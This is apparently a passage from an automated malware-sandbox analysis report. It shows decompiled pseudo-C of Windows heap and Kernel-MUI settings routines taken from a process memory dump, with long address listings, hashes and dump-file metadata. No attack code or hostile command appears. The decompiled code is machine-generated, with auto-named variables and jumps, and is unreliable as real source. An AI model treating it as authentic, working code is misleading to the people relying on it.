				if(_t433 <  *((intOrPtr*)(__ecx + 0x70)) || _v20 <  *(__ecx + 0x1e8) >>  *((intOrPtr*)(__ecx + 0x240)) + 3) {
					_t513 = _t539;
					goto L9;
				} else {
					_t437 = E030E99BF(__ecx, __edx,  &_a4, 0);
					_t445 = _a4;
					_t514 = _t437;
					_v56 = _t514;
					if(_t445 - 0x201 > 0xfbff) {
						goto L14;
					} else {
						E030EA830(__ecx, _t514, _t445);
						_t506 =  *(_t553 + 0x238);
						_t551 =  *((intOrPtr*)(_t553 + 0x1e8)) - ( *(_t553 + 0x74) << 3);
						_t246 = _t506 >> 4;
						if(_t551 < _t506 - _t246) {
							_t508 =  *(_t553 + 0x23c);
							_t246 = _t508 >> 2;
							__eflags = _t551 - _t508 - _t246;
							if(_t551 > _t508 - _t246) {
								_t246 = E030FABD8(_t553);
								 *(_t553 + 0x23c) = _t551;
								 *(_t553 + 0x238) = _t551;
							}
						}
						goto L7;
					}
				}
			}



















































































                                                                                                                                                    0x030ea309
                                                                                                                                                    0x030ea316
                                                                                                                                                    0x030ea319
                                                                                                                                                    0x030ea31d
                                                                                                                                                    0x030ea32d
                                                                                                                                                    0x030ea331
                                                                                                                                                    0x03131e0d
                                                                                                                                                    0x03131e10
                                                                                                                                                    0x030ea3cb
                                                                                                                                                    0x030ea3cb
                                                                                                                                                    0x030ea3bd
                                                                                                                                                    0x030ea3c3
                                                                                                                                                    0x030ea3c3
                                                                                                                                                    0x030ea33a
                                                                                                                                                    0x03131e17
                                                                                                                                                    0x03131e1b
                                                                                                                                                    0x03131e1d
                                                                                                                                                    0x03131e2f
                                                                                                                                                    0x03131e34
                                                                                                                                                    0x03131e36
                                                                                                                                                    0x03131e3c
                                                                                                                                                    0x03131e3c
                                                                                                                                                    0x03131e3c
                                                                                                                                                    0x03131e3c
                                                                                                                                                    0x03131e36
                                                                                                                                                    0x03131e42
                                                                                                                                                    0x03131e45
                                                                                                                                                    0x03131e47
                                                                                                                                                    0x030ea3f8
                                                                                                                                                    0x030ea3f8
                                                                                                                                                    0x030ea3fb
                                                                                                                                                    0x030ea3fd
                                                                                                                                                    0x03131e50
                                                                                                                                                    0x030ea403
                                                                                                                                                    0x030ea411
                                                                                                                                                    0x030ea411
                                                                                                                                                    0x030ea411
                                                                                                                                                    0x030ea41e
                                                                                                                                                    0x030ea420
                                                                                                                                                    0x030ea424
                                                                                                                                                    0x030ea427
                                                                                                                                                    0x030ea7c9
                                                                                                                                                    0x030ea7cd
                                                                                                                                                    0x030ea7d2
                                                                                                                                                    0x030ea7d9
                                                                                                                                                    0x030ea7e0
                                                                                                                                                    0x030ea7e3
                                                                                                                                                    0x030ea7ed
                                                                                                                                                    0x030ea7f3
                                                                                                                                                    0x030ea7f9
                                                                                                                                                    0x030ea7ff
                                                                                                                                                    0x030ea802
                                                                                                                                                    0x030ea807
                                                                                                                                                    0x030ea809
                                                                                                                                                    0x030ea809
                                                                                                                                                    0x030ea809
                                                                                                                                                    0x030ea80f
                                                                                                                                                    0x030ea80f
                                                                                                                                                    0x030ea812
                                                                                                                                                    0x030ea81c
                                                                                                                                                    0x030ea821
                                                                                                                                                    0x030ea824
                                                                                                                                                    0x030ea42d
                                                                                                                                                    0x030ea42d
                                                                                                                                                    0x030ea42d
                                                                                                                                                    0x030ea42d
                                                                                                                                                    0x030ea42d
                                                                                                                                                    0x030ea436
                                                                                                                                                    0x030ea43a
                                                                                                                                                    0x030ea609
                                                                                                                                                    0x030ea60d
                                                                                                                                                    0x030ea612
                                                                                                                                                    0x030ea616
                                                                                                                                                    0x030ea61a
                                                                                                                                                    0x03131e57
                                                                                                                                                    0x03131e59
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03131e5f
                                                                                                                                                    0x030ea620
                                                                                                                                                    0x030ea627
                                                                                                                                                    0x03131e64
                                                                                                                                                    0x03131e66
                                                                                                                                                    0x03131e6c
                                                                                                                                                    0x03131e72
                                                                                                                                                    0x03131e76
                                                                                                                                                    0x03131e95
                                                                                                                                                    0x03131e9a
                                                                                                                                                    0x03131e78
                                                                                                                                                    0x03131e8d
                                                                                                                                                    0x03131e92
                                                                                                                                                    0x03131ea0
                                                                                                                                                    0x03131ea5
                                                                                                                                                    0x03131eaa
                                                                                                                                                    0x03131eb2
                                                                                                                                                    0x03131eb6
                                                                                                                                                    0x03131eb9
                                                                                                                                                    0x03131eb9
                                                                                                                                                    0x03131ebe
                                                                                                                                                    0x03131ec2
                                                                                                                                                    0x03131ec2
                                                                                                                                                    0x03131e66
                                                                                                                                                    0x030ea62d
                                                                                                                                                    0x030ea633
                                                                                                                                                    0x030ea636
                                                                                                                                                    0x030ea63a
                                                                                                                                                    0x030ea63c
                                                                                                                                                    0x030ea640
                                                                                                                                                    0x030ea642
                                                                                                                                                    0x030ea644
                                                                                                                                                    0x030ea644
                                                                                                                                                    0x030ea644
                                                                                                                                                    0x030ea64d
                                                                                                                                                    0x030ea64d
                                                                                                                                                    0x030ea651
                                                                                                                                                    0x030ea655
                                                                                                                                                    0x03131eca
                                                                                                                                                    0x03131ed1
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03131ed7
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030ea65b
                                                                                                                                                    0x030ea669
                                                                                                                                                    0x030ea66e
                                                                                                                                                    0x030ea670
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030ea676
                                                                                                                                                    0x030ea67b
                                                                                                                                                    0x030ea680
                                                                                                                                                    0x030ea682
                                                                                                                                                    0x03131f1a
                                                                                                                                                    0x030ea688
                                                                                                                                                    0x030ea688
                                                                                                                                                    0x030ea688
                                                                                                                                                    0x030ea68a
                                                                                                                                                    0x030ea68d
                                                                                                                                                    0x03131f24
                                                                                                                                                    0x03131f2a
                                                                                                                                                    0x03131f31
                                                                                                                                                    0x03131f43
                                                                                                                                                    0x03131f43
                                                                                                                                                    0x03131f31
                                                                                                                                                    0x030ea693
                                                                                                                                                    0x030ea697
                                                                                                                                                    0x030ea69d
                                                                                                                                                    0x030ea6a0
                                                                                                                                                    0x030ea6a6
                                                                                                                                                    0x030ea6a8
                                                                                                                                                    0x030ea6a8
                                                                                                                                                    0x030ea6a8
                                                                                                                                                    0x030ea6a8
                                                                                                                                                    0x030ea6b2
                                                                                                                                                    0x030ea6b7
                                                                                                                                                    0x030ea6c1
                                                                                                                                                    0x030ea6c6
                                                                                                                                                    0x030ea6d2
                                                                                                                                                    0x030ea6d9
                                                                                                                                                    0x030ea6e3
                                                                                                                                                    0x030ea6e6
                                                                                                                                                    0x030ea6eb
                                                                                                                                                    0x030ea6ed
                                                                                                                                                    0x030ea6ed
                                                                                                                                                    0x030ea6ed
                                                                                                                                                    0x030ea6ed
                                                                                                                                                    0x030ea6f3
                                                                                                                                                    0x030ea6f8
                                                                                                                                                    0x030ea702
                                                                                                                                                    0x030ea70a
                                                                                                                                                    0x030ea70e
                                                                                                                                                    0x030ea71a
                                                                                                                                                    0x030ea71e
                                                                                                                                                    0x03131fcb
                                                                                                                                                    0x03131fcf
                                                                                                                                                    0x03131fdd
                                                                                                                                                    0x03131fe3
                                                                                                                                                    0x03131fe3
                                                                                                                                                    0x030ea724
                                                                                                                                                    0x030ea728
                                                                                                                                                    0x030ea72a
                                                                                                                                                    0x030ea72d
                                                                                                                                                    0x030ea737
                                                                                                                                                    0x030ea73a
                                                                                                                                                    0x030ea73c
                                                                                                                                                    0x030ea742
                                                                                                                                                    0x030ea748
                                                                                                                                                    0x03131f4d
                                                                                                                                                    0x03131f50
                                                                                                                                                    0x03131f56
                                                                                                                                                    0x03131f5c
                                                                                                                                                    0x03131f5f
                                                                                                                                                    0x03131f7e
                                                                                                                                                    0x03131f83
                                                                                                                                                    0x03131f61
                                                                                                                                                    0x03131f76
                                                                                                                                                    0x03131f7b
                                                                                                                                                    0x03131f89
                                                                                                                                                    0x03131f8e
                                                                                                                                                    0x03131f93
                                                                                                                                                    0x03131f94
                                                                                                                                                    0x03131f9a
                                                                                                                                                    0x03131f9c
                                                                                                                                                    0x03131f9e
                                                                                                                                                    0x03131fa1
                                                                                                                                                    0x03131fa1
                                                                                                                                                    0x03131fa6
                                                                                                                                                    0x03131fa6
                                                                                                                                                    0x03131f50
                                                                                                                                                    0x030ea74e
                                                                                                                                                    0x030ea751
                                                                                                                                                    0x030ea754
                                                                                                                                                    0x030ea75d
                                                                                                                                                    0x030ea75e
                                                                                                                                                    0x030ea762
                                                                                                                                                    0x030ea767
                                                                                                                                                    0x03131faf
                                                                                                                                                    0x03131fb0
                                                                                                                                                    0x03131fb9
                                                                                                                                                    0x03131fbe
                                                                                                                                                    0x03131fc2
                                                                                                                                                    0x03131fc2
                                                                                                                                                    0x030ea76d
                                                                                                                                                    0x030ea76d
                                                                                                                                                    0x030ea775
                                                                                                                                                    0x030ea778
                                                                                                                                                    0x030ea77d
                                                                                                                                                    0x030ea77d
                                                                                                                                                    0x030ea71e
                                                                                                                                                    0x030ea782
                                                                                                                                                    0x030ea787
                                                                                                                                                    0x030ea789
                                                                                                                                                    0x03131ff3
                                                                                                                                                    0x030ea78f
                                                                                                                                                    0x030ea78f
                                                                                                                                                    0x030ea78f
                                                                                                                                                    0x030ea791
                                                                                                                                                    0x030ea794
                                                                                                                                                    0x03131ffd
                                                                                                                                                    0x03132006
                                                                                                                                                    0x0313200c
                                                                                                                                                    0x03132017
                                                                                                                                                    0x03132019
                                                                                                                                                    0x03132024
                                                                                                                                                    0x03132024
                                                                                                                                                    0x03132024
                                                                                                                                                    0x03132047
                                                                                                                                                    0x03132047
                                                                                                                                                    0x0313200c
                                                                                                                                                    0x030ea79a
                                                                                                                                                    0x030ea79f
                                                                                                                                                    0x030ea7a4
                                                                                                                                                    0x030ea7a9
                                                                                                                                                    0x030ea7ab
                                                                                                                                                    0x0313205a
                                                                                                                                                    0x030ea7b1
                                                                                                                                                    0x030ea7b1
                                                                                                                                                    0x030ea7b1
                                                                                                                                                    0x030ea7b3
                                                                                                                                                    0x030ea7b6
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030ea7bc
                                                                                                                                                    0x03132066
                                                                                                                                                    0x03132068
                                                                                                                                                    0x03132073
                                                                                                                                                    0x03132073
                                                                                                                                                    0x03132073
                                                                                                                                                    0x03132078
                                                                                                                                                    0x03132079
                                                                                                                                                    0x0313207d
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0313207d
                                                                                                                                                    0x030ea7b6
                                                                                                                                                    0x030ea440
                                                                                                                                                    0x030ea440
                                                                                                                                                    0x030ea440
                                                                                                                                                    0x030ea446
                                                                                                                                                    0x030ea44c
                                                                                                                                                    0x030ea44f
                                                                                                                                                    0x030ea453
                                                                                                                                                    0x030ea455
                                                                                                                                                    0x031320b3
                                                                                                                                                    0x031320b9
                                                                                                                                                    0x031320b9
                                                                                                                                                    0x030ea45d
                                                                                                                                                    0x030ea460
                                                                                                                                                    0x030ea464
                                                                                                                                                    0x030ea466
                                                                                                                                                    0x030ea46b
                                                                                                                                                    0x030ea46f
                                                                                                                                                    0x030ea471
                                                                                                                                                    0x030ea471
                                                                                                                                                    0x030ea471
                                                                                                                                                    0x030ea474
                                                                                                                                                    0x030ea479
                                                                                                                                                    0x030ea47d
                                                                                                                                                    0x030ea47f
                                                                                                                                                    0x03132229
                                                                                                                                                    0x0313222f
                                                                                                                                                    0x030ea3c8
                                                                                                                                                    0x030ea3c8
                                                                                                                                                    0x030ea3ca
                                                                                                                                                    0x030ea3ca
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030ea3ca
                                                                                                                                                    0x03132235
                                                                                                                                                    0x0313223a
                                                                                                                                                    0x0313223a
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03132240
                                                                                                                                                    0x03132246
                                                                                                                                                    0x0313224a
                                                                                                                                                    0x03132269
                                                                                                                                                    0x0313226e
                                                                                                                                                    0x0313224c
                                                                                                                                                    0x03132261
                                                                                                                                                    0x03132266
                                                                                                                                                    0x03132274
                                                                                                                                                    0x03132279
                                                                                                                                                    0x0313227e
                                                                                                                                                    0x03132286
                                                                                                                                                    0x03132288
                                                                                                                                                    0x0313228d
                                                                                                                                                    0x0313228d
                                                                                                                                                    0x03132292
                                                                                                                                                    0x03132292
                                                                                                                                                    0x03132295
                                                                                                                                                    0x03132295
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03132295
                                                                                                                                                    0x030ea485
                                                                                                                                                    0x030ea489
                                                                                                                                                    0x030ea48b
                                                                                                                                                    0x030ea48f
                                                                                                                                                    0x030ea493
                                                                                                                                                    0x030ea497
                                                                                                                                                    0x030ea49b
                                                                                                                                                    0x030ea4bb
                                                                                                                                                    0x030ea4bb
                                                                                                                                                    0x030ea4bd
                                                                                                                                                    0x030ea4ff
                                                                                                                                                    0x030ea4ff
                                                                                                                                                    0x030ea501
                                                                                                                                                    0x030ea505
                                                                                                                                                    0x030ea50f
                                                                                                                                                    0x030ea517
                                                                                                                                                    0x030ea51b
                                                                                                                                                    0x030ea527
                                                                                                                                                    0x030ea52b
                                                                                                                                                    0x03132182
                                                                                                                                                    0x03132185
                                                                                                                                                    0x03132193
                                                                                                                                                    0x03132199
                                                                                                                                                    0x03132199
                                                                                                                                                    0x030ea531
                                                                                                                                                    0x030ea535
                                                                                                                                                    0x030ea538
                                                                                                                                                    0x030ea548
                                                                                                                                                    0x030ea54b
                                                                                                                                                    0x030ea54d
                                                                                                                                                    0x030ea553
                                                                                                                                                    0x030ea559
                                                                                                                                                    0x03132100
                                                                                                                                                    0x03132103
                                                                                                                                                    0x03132109
                                                                                                                                                    0x0313210f
                                                                                                                                                    0x03132112
                                                                                                                                                    0x03132131
                                                                                                                                                    0x03132136
                                                                                                                                                    0x03132114
                                                                                                                                                    0x03132129
                                                                                                                                                    0x0313212e
                                                                                                                                                    0x0313213c
                                                                                                                                                    0x03132141
                                                                                                                                                    0x03132147
                                                                                                                                                    0x0313214d
                                                                                                                                                    0x03132151
                                                                                                                                                    0x03132154
                                                                                                                                                    0x03132154
                                                                                                                                                    0x03132159
                                                                                                                                                    0x03132159
                                                                                                                                                    0x03132103
                                                                                                                                                    0x030ea55f
                                                                                                                                                    0x030ea562
                                                                                                                                                    0x030ea565
                                                                                                                                                    0x030ea567
                                                                                                                                                    0x03132162
                                                                                                                                                    0x030ea56d
                                                                                                                                                    0x030ea574
                                                                                                                                                    0x030ea575
                                                                                                                                                    0x030ea579
                                                                                                                                                    0x030ea57e
                                                                                                                                                    0x03132169
                                                                                                                                                    0x0313216a
                                                                                                                                                    0x03132170
                                                                                                                                                    0x03132175
                                                                                                                                                    0x03132179
                                                                                                                                                    0x03132179
                                                                                                                                                    0x030ea57e
                                                                                                                                                    0x030ea584
                                                                                                                                                    0x030ea58f
                                                                                                                                                    0x030ea58f
                                                                                                                                                    0x030ea52b
                                                                                                                                                    0x030ea5ad
                                                                                                                                                    0x030ea5bc
                                                                                                                                                    0x030ea5c1
                                                                                                                                                    0x030ea5c6
                                                                                                                                                    0x030ea5cb
                                                                                                                                                    0x030ea5cd
                                                                                                                                                    0x031321a9
                                                                                                                                                    0x030ea5d3
                                                                                                                                                    0x030ea5d3
                                                                                                                                                    0x030ea5d3
                                                                                                                                                    0x030ea5d5
                                                                                                                                                    0x030ea5d8
                                                                                                                                                    0x031321b3
                                                                                                                                                    0x031321bc
                                                                                                                                                    0x031321c2
                                                                                                                                                    0x031321cd
                                                                                                                                                    0x031321cf
                                                                                                                                                    0x031321da
                                                                                                                                                    0x031321da
                                                                                                                                                    0x031321da
                                                                                                                                                    0x031321f7
                                                                                                                                                    0x031321f7
                                                                                                                                                    0x031321c2
                                                                                                                                                    0x030ea5de
                                                                                                                                                    0x030ea5e3
                                                                                                                                                    0x030ea5e8
                                                                                                                                                    0x030ea5ea
                                                                                                                                                    0x0313220a
                                                                                                                                                    0x030ea5f0
                                                                                                                                                    0x030ea5f0
                                                                                                                                                    0x030ea5f0
                                                                                                                                                    0x030ea5f2
                                                                                                                                                    0x030ea5f5
                                                                                                                                                    0x03132219
                                                                                                                                                    0x0313221b
                                                                                                                                                    0x0313208c
                                                                                                                                                    0x0313208c
                                                                                                                                                    0x0313208c
                                                                                                                                                    0x03132095
                                                                                                                                                    0x03132096
                                                                                                                                                    0x03132097
                                                                                                                                                    0x03132098
                                                                                                                                                    0x031320a4
                                                                                                                                                    0x031320a5
                                                                                                                                                    0x031320a9
                                                                                                                                                    0x031320a9
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030ea5f5
                                                                                                                                                    0x030ea4bf
                                                                                                                                                    0x030ea4d3
                                                                                                                                                    0x030ea4d8
                                                                                                                                                    0x030ea4da
                                                                                                                                                    0x03131ede
                                                                                                                                                    0x03131ede
                                                                                                                                                    0x03131ee4
                                                                                                                                                    0x03131ee9
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03131f07
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03131f07
                                                                                                                                                    0x030ea4e0
                                                                                                                                                    0x030ea4e5
                                                                                                                                                    0x030ea4e7
                                                                                                                                                    0x031320cb
                                                                                                                                                    0x030ea4ed
                                                                                                                                                    0x030ea4ed
                                                                                                                                                    0x030ea4ed
                                                                                                                                                    0x030ea4f2
                                                                                                                                                    0x030ea4f5
                                                                                                                                                    0x031320d5
                                                                                                                                                    0x031320de
                                                                                                                                                    0x031320e4
                                                                                                                                                    0x031320f6
                                                                                                                                                    0x031320f6
                                                                                                                                                    0x031320e4
                                                                                                                                                    0x030ea4fb
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030ea4fb
                                                                                                                                                    0x030ea4a1
                                                                                                                                                    0x030ea4a4
                                                                                                                                                    0x030ea4a8
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030ea4aa
                                                                                                                                                    0x030ea4ac
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030ea4b2
                                                                                                                                                    0x030ea4b5
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030ea4b5
                                                                                                                                                    0x030ea43a
                                                                                                                                                    0x030ea340
                                                                                                                                                    0x030ea346
                                                                                                                                                    0x030ea600
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030ea600
                                                                                                                                                    0x030ea34f
                                                                                                                                                    0x030ea351
                                                                                                                                                    0x030ea358
                                                                                                                                                    0x030ea3c6
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030ea371
                                                                                                                                                    0x030ea37a
                                                                                                                                                    0x030ea37f
                                                                                                                                                    0x030ea382
                                                                                                                                                    0x030ea384
                                                                                                                                                    0x030ea394
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030ea396
                                                                                                                                                    0x030ea399
                                                                                                                                                    0x030ea3a7
                                                                                                                                                    0x030ea3b0
                                                                                                                                                    0x030ea3b4
                                                                                                                                                    0x030ea3bb
                                                                                                                                                    0x030ea3d2
                                                                                                                                                    0x030ea3da
                                                                                                                                                    0x030ea3df
                                                                                                                                                    0x030ea3e1
                                                                                                                                                    0x030ea3e5
                                                                                                                                                    0x030ea3ea
                                                                                                                                                    0x030ea3f0
                                                                                                                                                    0x030ea3f0
                                                                                                                                                    0x030ea3e1
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030ea3bb
                                                                                                                                                    0x030ea394

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.488413198.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                    • Associated: 00000015.00000002.488921669.00000000031BB000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000015.00000002.488950768.00000000031BF000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                                                                                                                    • API String ID: 0-523794902
                                                                                                                                                    • Opcode ID: 7c8ddd167e72a6523b355a6eb244457c45c2ff9a98442bff3f27d6133c604716
                                                                                                                                                    • Instruction ID: f149069505dfca45453e3163d1baf482bf7a1a9ca616416cca2c8ff74f0f9d50
                                                                                                                                                    • Opcode Fuzzy Hash: 7c8ddd167e72a6523b355a6eb244457c45c2ff9a98442bff3f27d6133c604716
                                                                                                                                                    • Instruction Fuzzy Hash: 9642FD3570A3809FC715DF38C884A6ABBE9FF8D604F08496DE8968B352D734D986CB51
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 030D3D34, Relevance: 6.7, Strings: 5, Instructions: 435COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 96%
                                                                                                                                                    			E030D3D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E030D1B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L030E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E030D1B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L030E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E030D1B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E030D1B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E030D1B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L030E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L030E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L030E4620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E0310F3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E03111370(_t276, 0x30a4e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E0310BB40(0,  &_v68, _t170);
									if(L030D43C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L030E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L030E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E0310BB40(_t257,  &_v68, _t243);
								if(L030D43C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E03111370(_t278, 0x30a4e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L030E4620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E0310F3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E03111370(_v16, 0x30a4e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E0310BB40(_t262,  &_v68, _t244);
								if(L030D43C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E03111370(_t282, 0x30a4e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E0310BB40(_t262,  &_v68, _t201);
							if(L030D43C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L030E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L030E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L030E4620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E0310F3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E03111370(_t280, 0x30a4e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E0310BB40(_t267,  &_v68, _t245);
							if(L030D43C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E03111370(_t284, 0x30a4e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E0310BB40(_t267,  &_v68, _t224);
						if(L030D43C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L030E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L030E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}










































                                                                                                                                                    0x030d3d3c
                                                                                                                                                    0x030d3d42
                                                                                                                                                    0x030d3d44
                                                                                                                                                    0x030d3d46
                                                                                                                                                    0x030d3d49
                                                                                                                                                    0x030d3d4c
                                                                                                                                                    0x030d3d4f
                                                                                                                                                    0x030d3d52
                                                                                                                                                    0x030d3d55
                                                                                                                                                    0x030d3d58
                                                                                                                                                    0x030d3d5b
                                                                                                                                                    0x030d3d5f
                                                                                                                                                    0x030d3d61
                                                                                                                                                    0x030d3d66
                                                                                                                                                    0x03128213
                                                                                                                                                    0x03128218
                                                                                                                                                    0x030d4085
                                                                                                                                                    0x030d4088
                                                                                                                                                    0x030d408e
                                                                                                                                                    0x030d4094
                                                                                                                                                    0x030d409a
                                                                                                                                                    0x030d40a0
                                                                                                                                                    0x030d40a6
                                                                                                                                                    0x030d40a9
                                                                                                                                                    0x030d40af
                                                                                                                                                    0x030d40b6
                                                                                                                                                    0x030d40bd
                                                                                                                                                    0x030d40bd
                                                                                                                                                    0x030d3d83
                                                                                                                                                    0x0312821f
                                                                                                                                                    0x03128229
                                                                                                                                                    0x03128238
                                                                                                                                                    0x03128238
                                                                                                                                                    0x0312823d
                                                                                                                                                    0x0312823d
                                                                                                                                                    0x030d3da0
                                                                                                                                                    0x030d3daf
                                                                                                                                                    0x030d3db5
